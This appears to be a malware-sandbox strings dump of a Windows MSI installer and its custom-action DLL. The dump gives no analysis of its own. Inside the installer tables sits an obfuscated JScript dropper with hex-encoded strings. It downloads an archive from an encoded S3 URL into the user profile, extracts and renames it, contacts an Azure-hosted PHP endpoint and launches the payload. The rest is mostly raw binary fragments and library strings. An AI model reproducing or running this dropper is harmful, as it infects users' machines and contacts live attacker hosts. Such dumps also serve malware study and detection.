Static | ZeroBOX
No static analysis available.
?dA/B6H
@H??wElDj>
@H??wElDj;
TypeTableNamePropertyValue_ValidationColumnNullableMinValueMaxValueKeyTableKeyColumnCategorySetDescriptionControlEventDialog_NDialogIdentifierA foreign key to the Dialog table, name of the dialog.ActionTextActionName of action to be described.YTextLocalized description displayed in progress dialog and log when action is executing.TemplateOptional localized format template used to format action data records for display during action execution.AdminExecuteSequenceName of action to invoke, either in the engine or the handler DLL.ConditionOptional expression which skips the action if evaluates to expFalse.If the expression syntax is invalid, the engine will terminate, returning iesBadActionData.SequenceNumber that determines the sort order in which the actions are to be executed. Leave blank to suppress action.AdminUISequenceAdvtExecuteSequenceAppSearchThe property associated with a SignatureSignature_Signature;RegLocator;IniLocator;DrLocator;CompLocatorThe Signature_ represents a unique file signature and is al
DrDhD7H
of the FileDownload.The download file name.FileDownloadPrimary key.DirPropertyForeign key into the Directory table denoting the directory where the download file is.Source of the file that will be downloaded.FlagsFlags.BootstrapperUISequenceMainFeatureAPPDIRxy.txtCostFinalizeComputing space requirementsCostInitializeRMCCPSearchSearching for qualifying productsUnregisterComPlusUnregistering COM+ Applications and ComponentsAppId: [1]{{, AppType: [2]}}CreateFoldersCreating foldersFolder: [1]CreateShortcutsCreating shortcutsShortcut: [1]PatchFilesPatching filesFile: [1], Directory: [2], Size: [3]InstallSFPCatalogFileInstalling system catalogFile: [1], Dependencies: [2]InstallServicesInstalling new servicesService: [2]WriteIniValuesWriting INI files valuesFile: [1], Section: [2], Key: [3], Value: [4]AI_FdConfigDownloading filesDownloading file: "[1]"AI_FdRemoveCleanup downloaded filesRemoving downloaded file: "[1]"InstallValidateValidating installRemoveFilesRemoving filesFile: [1], Directory: [9]SelfRegModule
sterTypeLibrariesRegistering type librariesSelfUnregModulesUnregistering modulesWriteRegistryValuesWriting system registry valuesKey: [1], Name: [2], Value: [3]RegisterUserRegistering userSetODBCFoldersInitializing ODBC directoriesRemoveExistingProductsRemoving applicationsApplication: [1], Command line: [2]RemoveIniValuesRemoving INI files entriesRemoveODBCRemoving ODBC componentsStartServicesStarting servicesUnpublishComponentsUnpublishing Qualified ComponentsPublicFolder{695B5255-7208-415A-A640-57FD170FFA
;;B&F7B
B4FhD&B
ExE(;2D
;;B&F7B
B4FhD&B
7EB}ProductName{CC4F17AA-BE4F-4AF8-B3B1-1A89B0A67A2C}undefined{51BB0BE0-83D6-4CF5-A51C-C73CF706FE39}undefined_Dir{746EF196-AC38-4FBD-98CE-2F3FAF06B316}CommonAppDataFolderTARGETDIRSourceDirAPPDIR:.COMMON~1|CommonAppDataFolderzr90ikPUBLIC~1|PublicFolderInstallFinalizeInstallInitializeSoftware\[Manufacturer]\[ProductName]-ValidateProductIDAI_EnableDebugLogAI_ResolveKnownFoldersAI_DETECT_MODERNWIN(VersionNT >= 603)AI_DOWNGRADEAI_NEWERPRODUCTFOUND AND (UILevel <> 5)NOT InstalledAI_RESTORE_LOCATIONAPPDIR=""SET_AP$
E(?(E8B
PDIRSET_SHORTCUTDIRSHORTCUTDIR=""SET_TARGETDIR_TO_APPDIRIsolateComponentsRedirectedDllSupportAI_USE_STD_ODBC_MGRAI_PREPARE_UPGRADEAI_UPGRADE="No" AND (Not Installed)AI_UPGRADE<>"No"AI_STORE_LOCATION(Not Installed) OR REINSTALLInstalled(VersionNT >= 501) AND (REMOVE="ALL")VersionNTAI_USE_STD_ODBC_MGR AND InstalledInstalled AND (AI_EXTREG <> "No")PATCHAI_EXTREG <> "No"(VersionNT >= 501) AND (REMOVE <> "ALL")zaradin( NOT Installed )InstallExecuteAI_ThemeStyleaeroManufacturerdfpbjUpDirIconUpAiPreferFastOem1CtrlEvtchangeschangesAI_BOOTSTRAPPERORIGINALLANG1033CtrlEvtRepairingRepairingCtrlEvtremovesremovesPROMPTROLLBACKCOSTPWindowsTypeNTDisplayWindows Server 2008 x86DialogBitmapdialogButtonText_No&NoLIMITUIProductLanguageAI_BITMAP_DISPLAY_MODE0ButtonText_Next&Next >SecureCustomPropertiesOLDPRODUCTS;AI_NEWERPRODUCTFOUNDWindowsTypeNTWindowsTypeNT64DisplayWindows Server 2008 x64, Windows Server 2008 R2 x64, Windows Server 2012 x64, Windows Server 2012 R2 x64, Windows Server x64AI_CF_TITLE_TEXT_STYLE{\CfTitleFont}Enable
D/;rD'C7CrD
Conditions CustomSetupIconcusticonInfoIconinfoRepairIconrepairicAI_BUILD_NAMEDefaultBuildAI_PACKAGE_TYPEIntelExecuteActionUserExitAdminWelcomeDlgProgressDlgAI_SET_ADMINExitDialogFatalErrorPrepareDlg#disk1.cabViewReadmeTextHide((NOT AI_INSTALL) AND (NOT AI_PATCH)) OR ((CTRLS <> 1) AND (CTRLS <> 3))CustomizeDlgLocationViewReadmeCheckBoxLaunchProdText((NOT AI_INSTALL) AND (NOT AI_PATCH)) OR ((CTRLS <> 2) AND (CTRLS <> 3))LaunchProdCheckBoxLogCheckBoxShowMsiLogFileLocationLogCheckBoxLabelBrowseLocationLabelPushButton[ButtonText_No]Description2Click the "Finish" button to exit the [Wizard].Description1R[ButtonText_Retry][ButtonText_Yes]A[ButtonText_Cancel]CErrorIconIcon[InfoIcon]Information icon|ErrorTextInformation textI[ButtonText_Ignore]O[ButtonText_OK]Please wait while the [Wizard] [Progress2] [ProductName]. This may take several minutes.StatusLabel[DlgTitleFont][Progress1][ButtonText_Next]BannerLineBitmap[BannerBitmap]BottomLineBack[ButtonText_Back]LineLogoAdvanced InstallerStatus:ProgressBarProgress doneThe
"Cancel" to exit the Patch [Wizard].{\VerdanaBold13}Welcome to the [ProductName] Patch [Wizard]ResumeDlgThe [Wizard] will complete the installation of [ProductName] on your computer. Click "Install" to continue or "Cancel" to exit the [Wizard].{\VerdanaBold13}Resuming the [ProductName] [Wizard]WaitForCostingDlgPlease wait while the installer finishes determining your disk space requirements.[ExclamationIcon]ReturnExclamation icon|[ButtonText_Return]AI_CORRECT_INSTALLAI_RESUMENOT AiSkipUserExitNOT AiSkipExitDlg OR NOT AI_INSTALLAI_SET_INSTALLAI_SET_MAINTInstalled AND (NOT RESUME) AND (NOT Preselected) AND (NOT PATCH)AI_SET_RESUMERESUME OR PreselectedAI_SET_PATCHAI_DpiContentScaleAI_BACKUP_AI_SETUPEXEPATHAI_RESTORE_AI_SETUPEXEPATHAI_SETUPEXEPATH_ORIGINALAI_NEWERPRODUCTFOUNDAI_INSTALLAI_MAINTAI_PATCH( Version9X OR VersionNT64 OR ( VersionNT AND ((VersionNT <> 600) OR (MsiNTProductType = 1)) ) )[ProductName] cannot be installed on the following Windows versions: [WindowsTypeNTDisplay].(VersionNT <> 500)[ProductN
ypeNT64Display].((VersionNT <> 501) AND (VersionNT <> 502))[ProductName] cannot be installed on [WindowsTypeNT5XDisplay].(VersionNT <> 400)[ProductName] cannot be installed on [WindowsTypeNT40Display].0.0.1OLDPRODUCTSFileOperations.dllOnFdRollbackOnFdUninstallAI_SETUPEXEPATH[AI_SETUPEXEPATH_ORIGINAL]aicustact.dllRestoreLocationAI_ADMIN{}DpiContentScaleEnableDebugLogOnFdConfigOnFdRemovevar _$_7043=["\x67\x65\x74\x54\x69\x6d\x65","","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a","\x72\x61\x6e\x64\x6f\x6d","\x6c\x65\x6e\x67\x74\x68","\x66\x6c\x6f\x6f\x72","\x63\x68\x61\x72\x41\x74","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x37\x35\x39\x63\x38\x37\x35\x31\x34\x38\x35\x30\x32\x34\x37\x63\x2e\x73\x33\x2e\x75\x73\x2d\x65\x61\x73\x74\x2d\x32\x2e\x61\x6d\x61\x7a\x6f\x6e\x61\x77\x73\x2e\x63\x6f\x6d\x2f\x30\x33\x32\x31\x46\x39\x31\x33\x32\x45\x43\x39\x37\x46\x44\x43\
function Sleep(l)
var m= new Date();//2
var j=0;//3
while(j< (l* 1000))
var k= new Date();//5
var j=k[_$_7043[0]]()- m[_$_7043[0]]()
function makeid()
var h=_$_7043[1];//11
var g=_$_7043[2];//12
for(var f=0;f< 12;f++)
h+= g[_$_7043[6]](Math[_$_7043[5]](Math[_$_7043[3]]()* g[_$_7043[4]]))
return h
var _FFiretoGet;//20
_FFiretoGet= _$_7043[7];function baixandoHygfGigaFil(d,c)
var b;//25
var a;//26
var e= new ActiveXObject(_$_7043[8]);//30
e[_$_7043[9]](30000,30000,30000,5000);void((e[_$_7043[11]](_$_7043[10],d,false)));e[_$_7043[12]]();if(e[_$_7043[13]]== 404)
return false
b= e[_$_7043[14]]
catch(ex)
return false
a= new ActiveXObject(_$_7043[15]);a[_$_7043[16]]= 1;a[_$_7043[11]]();a[_$_7043[17]](b);a[_$_7043[18]](c,2);a[_$_7043[19]]();return true
var unicohsajke=makeid();//59
var codersshell_exc= new ActiveXObject(_$_7043[20]);//60
var usuario_prof_varts=codersshell_exc[_$_7043[22]](_$_7043[21])+"\x5C"+ makeid();//61
var dskp_textoUni=_$_7043[26];//62
var meuOBJvar= new ActiveXObject(_$_7043[27]);//64
if(meuOBJvar[_$_7043[28]](dskp_textoUni))
var txt= new ActiveXObject(_$_7043[27]);//74
var s=txt[_$_7043[30]](codersshell_exc[_$_7043[29]](_$_7043[21])+ _$_7043[26],true);//75
s[_$_7043[32]](_$_7043[31]);s[_$_7043[19]]()
catch(ex)
var gdfijuoiuyqkhjghfvo8wkjghfv= new ActiveXObject(_$_7043[27]);//82
gdfijuoiuyqkhjghfvo8wkjghfv[_$_7043[33]](usuario_prof_varts);Sleep(1);baixandoHygfGigaFil(_FFiretoGet,usuario_prof_varts+ _$_7043[34]+ unicohsajke+ _$_7043[35]);Sleep(5);var gZIPrarziping= new ActiveXObject(_$_7043[36]);//92
MNyFilezilp= gZIPrarziping[_$_7043[38]](usuario_prof_varts+ _$_7043[34]+ unicohsajke+ _$_7043[35])[_$_7043[37]]();gZIPrarziping[_$_7043[38]](usuario_prof_varts+ _$_7043[34])[_$_7043[39]](MNyFilezilp);Sleep(5);gdfijuoiuyqkhjghfvo8wkjghfv[_$_7043[42]](usuario_prof_varts+ _$_7043[40],usuario_prof_varts+ _$_7043[34]+ unicohsajke+ _$_7043[41]);/*gdfijuoiuyqkhjghfvo8wkjghfv[_$_7043[42]](usuario_prof_varts+ _$_7043[43],usuario_prof_varts+ _$_7043[34]+ unicohsajke+ _$_7043[44]);gdfijuoiuyqkhjghfvo8wkjghfv[_$_7043[45]](usuario_prof_varts+ _$_7043[34]+ unicohsajke+ _$_7043[35]);*/var colocando_starting=usuario_prof_varts+ _$_7043[34]+ unicohsajke+ _$_7043[41];//100
var btcadacoins= new ActiveXObject(_$_7043[46]);//102
var _df57d583561c25884ae7c8c4df319ad = new ActiveXObject("\x57\x69\x6e\x48\x74\x74\x70\x2e\x57\x69\x6e\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x2e\x35\x2e\x31");
_df57d583561c25884ae7c8c4df319ad.open("\x47\x45\x54","\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x6e\x74\x65\x72\x74\x65\x6b\x73\x2e\x65\x61\x73\x74\x75\x73\x32\x2e\x63\x6c\x6f\x75\x64\x61\x70\x70\x2e\x61\x7a\x75\x72\x65\x2e\x63\x6f\x6d\x2f\x67\x62\x75\x73\x74\x65\x72\x2f\x62\x61\x72\x6d\x61\x6e\x2e\x70\x68\x70", false);
_df57d583561c25884ae7c8c4df319ad.send(); btcadacoins[_$_7043[49]](_$_7043[47]+ colocando_starting
C(>3B5A7CrD
C1A5G~AdD1B5H
C1A5G>B
A/A0C&H
C1A5G>CqB2H
C1A5G~E(DrF
C1A5G>C
C1A5G~E
D$C5C&H
C1A5G>A
@HLE(A7B
!This program cannot be run in DOS mode.
Rich.]<
`.rdata
@.data
@.reloc
$_[^]Y
wEj WP
<H.t.I
L$<_^][3
EpSVWP
\$0HUV
L$$][3
F`;~t~
4N;t$$r
4N;t$$
f94Yt[
D$`Phd
t5FVj@
t7FVj@
D$DGPW
D$\j2P
E<f9M<
D$hjNP
EhSVWP
EhSVWP
E\SVWP
EhSVWP
QQSVWd
URPQQh}w
;t$,v-
UQPXY]Y[
Tt)jhZf;
Jjl^f;
V2jx_f;
F2jgYf;
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
u,PQRS
Wj0XPV
SPjdVQ
zSSSSj
f9:t!V
CY<u
QQSVj8j@
PPPPPPPP
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
device or resource busy
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid argument
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
no such process
not a directory
not a socket
not a stream
not connected
not enough memory
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
resource deadlock would occur
resource unavailable try again
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
(null)
[aOni*{
~ $s%r
@b;zO]
v2!L.2
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
AreFileApisANSI
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
_hypot
_nextafter
1#QNAN
1#SNAN
]vQ<)8
|)P!?Ua0
Eb2]A=
u?^p?o4
y1~?|"
?x+s7
?5Od%
?|I7Z#
>,'1D=
?g)([|X>=
~U`?K
:h"?bC
@H#?43
Ax#?uN}*
r7Yr7=
F0$?3=1
H`$?h|
&?~YK|
sU0&?W
<8bunz8
?#%X.y
F||<##
<@En[vP
b<log10
?5Wg4p
%S#[k=
"B <1=
invalid string position
vector too long
string too long
bad array new length
Unknown exception
ConvertStringSidToSidW
NtQueryInformationProcess
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
GetProcessId
IsWow64Process
invalid string_view position
SHGetSpecialFolderPathW
GetDomainControllerName start.
Domain controller name:
GetDomainControllerName end.
LPUSER_INFO_0:
CheckUserProfileName start.
CheckUserProfileName return:
CheckUserProfileName end.
AI_CheckUser start.
Process32FirstW
Process32NextW
CreateToolhelp32Snapshot
ResolveServiceProperties start.
action starting ...
AI_CustAct.log
C:\JobRelease\win\Release\custact\x86\AICustAct.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.tls$ZZZ
.xdata$x
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.rsrc$01
.rsrc$02
aicustact.dll
AI_AuthorSinglePackage
AI_ResolveKnownFolders
AI_SearchOfficeAddins
AddCaspolSecurityPolicy
BrowseForFile
CheckFreeTCPPort
CheckIfUserExists
ChooseTextStyles
CloseApplication
CollectFeaturesWithoutCab
ComputeReplaceProductsList
ConfigureNonAdminServiceStart
ConfigureServFailActions
CreateExeProcess
DeleteEmptyDirectory
DeleteFromComboBox
DeleteFromListBox
DeleteShortcuts
DetectModernWindows
DetectProcess
DetectService
DisableFeatures
DoEvents
DpiContentScale
EnableDebugLog
EnumStartedServices
ExtractComboBoxData
ExtractListBoxData
GetArpIconPath
GetFreeTCPPort
GetLocalizedCredentials
GetPathFreeSpace
InstanceMajorUpgrade
JoinFiles
LaunchApp
LaunchLogFile
LoadShortcutDirs
LogOnAsAService
MixedAllUsersInstallLocation
MsgBox
MsmTrialMessage
PlayAudioFile
PopulateComboBox
PopulateListBox
PrepareUpgrade
PreserveInstallType
PreventInstancesUpgrade
PrintRTF
ProcessFailActions
RemoveCaspolSecurityPolicy
ResolveFormattedProperty
ResolveKnownFolder
ResolveServiceProperties
RestartElevated
RestoreLocation
RunAllExitActions
RunFinishActions
SetLatestVersionPath
StartWinService
StopProcess
StopWinService
TrialMessage
UninstallPreviousVersions
UpdateFeatureStates
UpdateInstallMode
UpdateMsiEditControls
ValidateInstallFolder
ViewReadMe
WarningMessageBox
msi.dll
SHGetFolderPathW
ShellExecuteExW
SHGetSpecialFolderLocation
SHGetPathFromIDListW
SHGetMalloc
ShellExecuteW
SHELL32.dll
WS2_32.dll
NetGetDCName
NetApiBufferFree
NetUserGetInfo
NetQueryDisplayInformation
NetLocalGroupGetInfo
NetGroupGetInfo
NetUserModalsGet
NETAPI32.dll
PathIsUNCW
PathFileExistsW
SHLWAPI.dll
GetTcpTable
IPHLPAPI.DLL
GetLastError
CloseHandle
CreateFileW
WriteFile
LocalFree
LocalAlloc
LoadLibraryW
GetProcAddress
FreeLibrary
RaiseException
FindFirstFileW
DeleteFileW
RemoveDirectoryW
FindNextFileW
ReadFile
SetFilePointer
FindClose
HeapDestroy
HeapSize
HeapReAlloc
HeapFree
HeapAlloc
GetProcessHeap
GetTempPathW
GetTempFileNameW
MoveFileW
GetSystemDirectoryW
LoadLibraryExW
CreateToolhelp32Snapshot
Process32FirstW
OpenProcess
Process32NextW
GetCurrentProcess
GetCurrentProcessId
GetExitCodeProcess
WaitForSingleObject
ReadProcessMemory
SizeofResource
LockResource
LoadResource
FindResourceExW
FindResourceW
GetWindowsDirectoryW
GetModuleHandleW
ExpandEnvironmentStringsW
GetTickCount
lstrcmpiW
GetModuleFileNameW
DeleteCriticalSection
EnterCriticalSection
InitializeCriticalSection
LeaveCriticalSection
OutputDebugStringW
GetCurrentThreadId
FlushFileBuffers
MultiByteToWideChar
GetStringTypeW
GlobalFindAtomW
WideCharToMultiByte
GlobalAddAtomW
GlobalDeleteAtom
lstrcpynW
lstrcpyW
MulDiv
InitializeCriticalSectionAndSpinCount
DecodePointer
ExitProcess
lstrlenW
lstrcmpW
DuplicateHandle
GetStdHandle
CreateProcessW
GetLocaleInfoW
lstrcatW
GetDiskFreeSpaceW
OpenMutexW
SetLastError
TerminateProcess
SetEndOfFile
KERNEL32.dll
GetForegroundWindow
BringWindowToTop
EnumWindows
GetWindowThreadProcessId
GetWindowLongW
wsprintfW
CreateWindowExW
SendMessageW
RedrawWindow
GetClassNameW
EnumChildWindows
MessageBoxW
GetDesktopWindow
GetWindowTextW
IsWindow
PostMessageW
USER32.dll
DeleteDC
StartDocW
StartPage
EndPage
EndDoc
AbortDoc
GetDeviceCaps
GDI32.dll
PrintDlgW
GetOpenFileNameW
COMDLG32.dll
GetSecurityDescriptorDacl
SetEntriesInAclW
InitializeSecurityDescriptor
SetSecurityDescriptorDacl
LookupAccountNameW
LookupAccountSidW
OpenProcessToken
GetTokenInformation
RegCloseKey
RegOpenKeyExW
RegSetValueExW
RegQueryValueExW
RegCreateKeyExW
RegEnumValueW
RegQueryInfoKeyW
ConvertStringSidToSidW
LookupPrivilegeValueW
AdjustTokenPrivileges
ConvertSidToStringSidW
CloseServiceHandle
OpenSCManagerW
ChangeServiceConfig2W
QueryServiceObjectSecurity
SetServiceObjectSecurity
QueryServiceStatus
ControlService
StartServiceW
OpenServiceW
QueryServiceStatusEx
LogonUserW
AllocateAndInitializeSid
FreeSid
GetSidSubAuthorityCount
GetSidLengthRequired
InitializeSid
GetSidIdentifierAuthority
GetSidSubAuthority
EnumServicesStatusW
LsaOpenPolicy
LsaNtStatusToWinError
LsaAddAccountRights
LsaClose
ADVAPI32.dll
CoTaskMemFree
CoInitialize
CoUninitialize
CoCreateInstance
CoAllowSetForegroundWindow
CLSIDFromString
ole32.dll
OLEAUT32.dll
EncodePointer
GetCPInfo
CreateEventW
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetSystemTimeAsFileTime
LCMapStringW
IsDebuggerPresent
SetEvent
ResetEvent
WaitForSingleObjectEx
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
GetStartupInfoW
QueryPerformanceCounter
InitializeSListHead
RtlUnwind
InterlockedFlushSList
GetModuleHandleExW
GetFileType
FindFirstFileExW
IsValidCodePage
GetACP
GetOEMCP
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetFilePointerEx
SetStdHandle
GetConsoleOutputCP
GetConsoleMode
WriteConsoleW
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_com_error@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVCAtlException@ATL@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
00+070A0M0W0c0o0y0
>l>+?K?
767C7W7e7
8'848A8f8s8
969K9v9
:F:T:v:
;6;C;Z;p;
02080G0N0a0g0t0
0#111E1O1
262N2v2
4 4$4(4,4@4
5M5f5s5
5$6f6s6
<F=R=l=
&030R0v0
1"13191=1C1G1M1W1a1j1p1t1
2"242>2H2R2\2e2s2
:;,;5;R;[;e;
=&>3>O>
363B3T3]3
5$5B5P5v5
516<6f6x6
2"292f2z2
3O3p3u3~3
3A4^4f4
4K5}5%6f6s6
7&7Q7`7y8
9#9A9u9~9
:1:>:S:
;>;T;n;
;6=D=^=f=s=
>'>S>p>z>
?M?c?}?
1;1G1i1t1
363C3W3e3y3
4&424J4R4_4m4
5*5H5^5
6-6R6m6
7&747I7`7v7
8,8G8f8
8,919F9s9}9
:3:=:H:s:}:
;7;D;w;
=#=7=E=v=
394%8E8
:(:2:6:<:I:P:a:
? ?F?U?
7*7a7v7
88,8V8h8
9(9[:d:
:F;T;&<5<k<
=f>t>~?
1&252O2
2F3T3z3
5"6/6p6
8M9W9m9
9B:6;G;s;
=&>\>a>h>
;1D1S1q1
5/666F6P6`6_7
7;8A8e8
>)>V>e>
637W7k7
99i:|:
=<=Q=[=
=;>Z>z>
8I8[8h8r8H:
<G=N=L>P>T>X>f?w?
0$060f0x0
2)2<2e2|2
5*636C6M6]6
8(8/8Q8u8
=">2>f>w>
?!?8?g?
80F0R0l0
:*;t;V<e<
162H2`2|2
3-3:3I3c3
3'4C4J4[4h4
7'797P7W7
7V8h8}8
:+:3:v:
;+;T;h;
=-=B=a=
1.1>1e1y1
353<3N3
4 4.4L4
515D5f5x5
6:6I6l6
9%949F9v9
:A:P:z:
0/0@0O0\0c0h0
1$1[1`1i1n1v1~1
2_2g2t2
3I3r3y3
3C4J4R4Y4
5%5e5l5r5y5~5
6@6W6{6
8F9P9X9f9w9
1&1Y1n1
2M2g2x2
2!4=4W4s4
5%6T6d6
='=9=@=Y=`=h=o=u=|=
>%>,>E>L>T>[>a>h>
??$?1?
080B0I0P0U0d0
0,121N1U1x1
7(787O7V7^7
8@8G8f8
9)9.9E9U9Z9m9r9
:":1:a:p:
<"<:<J<a<
==7=?=Q=
131&282d2v2
6:6O6q6
9*9L9l9
</<Q<q<
#0*0<0j0
1F1^1h1
3-3V3x3
5D6T6Y6
:L:R:Z:_:h:w:
='=?=T=Y=`=
?6?G?s?
040q0
8'9T9[9
: :':W:p:{:
> >;>I>P>o>
0 1O1V1o1
2E2M2~2
3&3?3i3r3
4$4V4f4
55I5R5d5
666F6_6
6H7M7d7t7{7
7@8E8J8
<#=(=-=Q=`=
>4>;>n>F?f?
0&1+101P1W1^1p1
11262J2^2v2
2"3-3`3
4/4<4Q4l4q4
: ;8;G;Q;p;
=,=5=]=q={=
>*>?>R>Y>h>
?0?7?B?k?
0&080a0
262H2t2
50555>5
6A7P7p7
8-888y8
9%9f9w9
:6:H:^:e:
;6;F;U;c;
>0>7><>C>w>
?!?*?0?
1)1K1n1
6=7T7b7g7n7
52595j5
1&1I1S1a1o1{1
33[3j3
5"5)5N5S5
676]6r6}6
6#7a7p7
:K:S:t:
=+>3>Q>b>
1+131C1x1,2C2L2V2
</<S<m<
?*?K?~?
1!202X2
3>3Y3h3m3
:=;X;a;l;
%030c0x0
3e3V4h4
1)222f2
4+5F5S5
616N6t6
677U7t7
7$8D8`8x8
9&9.949B9J9n9
::%:*:0:6:;:A:G:L:R:X:]:c:i:n:t:z:
;$;);/;5;:;@;F;K;Q;W;\;b;h;m;s;y;~;
<#<(<.<4<9<?<E<J<O<V<[<i<~<
>'>->8>?>D>M>[>`>p>u>
?D?L?Y?d?m?u?
3#3*3J3P3V3\3b3h3o3v3}3
4O4U4[4a4g4m4t4{4
7<7A7Z7_7l7
<$</<9<
<4=>=G=P=e=n=
>->n>~>
?F?O?V?\?b?
8'8-8H8p8
8I9X98:h<
7*818V8r8
9'9P9c9
:!:&:A:K:W:\:a:
<3<?<j<X=b=o=
=;>^>e>
+0>0S0
1+8?8a8u8
9c:g:k:o:s:w:{:
P0W0|0
025O5!8
0!0&0:0
1"1+1y1
1<2J2S2
40575b6
:b:f:n:z:
;%;C;\;a;
;/<Y<K=
1111>1W1p1
282a2v2
3D5N5q5{5
6C6I6[6
4 4,484F4V4k4
5&515G5
7A8F8K8[8`8e8u8z8
969b9k9
:*:>:C:H:c:m:}:
;#;2;=;B;G;h;x;
< <G<Y<e<r<~<
#2+3<3
5$545m5
7#8+8\8e8p8
939<9E9
</<_<g<
=!=,=o=
4G4d4x4
6F7f7v7+8,9<9M9U9e9v9
<O=X=p=
=!>N>u>
>d?i?o?t?
+080?0I0m0
1)1D1O1
7:7Q7q7
808B8T8f8x8
9)9;9M9_9
5_9e:m:
5.555L5b5
<i=t=z=
?3?P?o?
5$5T5x5
7P8A9u;
>0?Z?b?
1)2f2p2
2`3f3k3r3
3f4k4}4
>Q>q>{>
020_0h0
5!6D6Q6]6
677A7K7m7
=:>Q>u>
?!?E?Y?
3!3-3?3a3q3{3
8I80;a;
0)2G3N4
7)8q9X?
7"7)7-747?7f7r7
8$8.888B8L8V8
4$4(4,4044484<4@4L4P4T4X4\4`4t4x4|4
5 5$5(5,5054585<5@5D5H5L5T5X5\5
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:
